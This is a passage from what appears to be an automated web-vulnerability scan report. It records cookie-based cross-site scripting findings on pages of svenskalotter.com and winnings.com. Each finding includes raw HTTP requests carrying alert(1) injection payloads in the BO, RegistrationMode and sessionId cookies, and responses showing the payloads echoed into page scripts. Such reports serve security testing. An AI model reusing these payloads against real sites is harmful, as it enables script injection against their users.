User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMbd471"-alert(1)-"bd1152df0ff; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: BO=FMbd471"-alert(1)-"bd1152df0ff; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMbd471"-alert(1)-"bd1152df0ff";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.447. http://www.svenskalotter.com/Responsible.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 364f9"-alert(1)-"7105550917d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM364f9"-alert(1)-"7105550917d; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM364f9"-alert(1)-"7105550917d; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM364f9"-alert(1)-"7105550917d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.448. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d17f"-alert(1)-"8c5694280b1 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM8d17f"-alert(1)-"8c5694280b1; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: BO=FM8d17f"-alert(1)-"8c5694280b1; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM8d17f"-alert(1)-"8c5694280b1";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.449. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81d92"-alert(1)-"6a66628d624 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM81d92"-alert(1)-"6a66628d624; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM81d92"-alert(1)-"6a66628d624; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM81d92"-alert(1)-"6a66628d624";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.450. http://www.svenskalotter.com/Terms.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c550"-alert(1)-"353d71a5ded was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM1c550"-alert(1)-"353d71a5ded; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: BO=FM1c550"-alert(1)-"353d71a5ded; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM1c550"-alert(1)-"353d71a5ded";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.451. http://www.svenskalotter.com/Terms.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d45"-alert(1)-"07a119d68b9 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM48d45"-alert(1)-"07a119d68b9; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM48d45"-alert(1)-"07a119d68b9; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM48d45"-alert(1)-"07a119d68b9";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.452. http://www.svenskalotter.com/UnderAge.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8028c"-alert(1)-"eacd23dd7a9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM8028c"-alert(1)-"eacd23dd7a9; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: BO=FM8028c"-alert(1)-"eacd23dd7a9; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM8028c"-alert(1)-"eacd23dd7a9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.453. http://www.svenskalotter.com/UnderAge.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7950"-alert(1)-"32888f9fa48 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMb7950"-alert(1)-"32888f9fa48; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb7950"-alert(1)-"32888f9fa48; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb7950"-alert(1)-"32888f9fa48";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.454. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/click/Svenskalotter.com/SWE/Home/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88356"-alert(1)-"e9826c072e5 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /click/Svenskalotter.com/SWE/Home/ HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM88356"-alert(1)-"e9826c072e5; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: BO=FM88356"-alert(1)-"e9826c072e5; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:11 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM88356"-alert(1)-"e9826c072e5";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.455. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/click/Svenskalotter.com/SWE/Home/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb647"-alert(1)-"81471023241 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /click/Svenskalotter.com/SWE/Home/ HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMbb647"-alert(1)-"81471023241; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbb647"-alert(1)-"81471023241; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:38:00 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbb647"-alert(1)-"81471023241";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.456. http://www.winnings.com/how-to-win-money [winnings[sessionId] cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/how-to-win-money

Issue detail

The value of the winnings[sessionId] cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff193</script><script>alert(1)</script>b44d02d0aa1 was submitted in the winnings[sessionId] cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /how-to-win-money HTTP/1.1
Host: www.winnings.com
Accept: */*
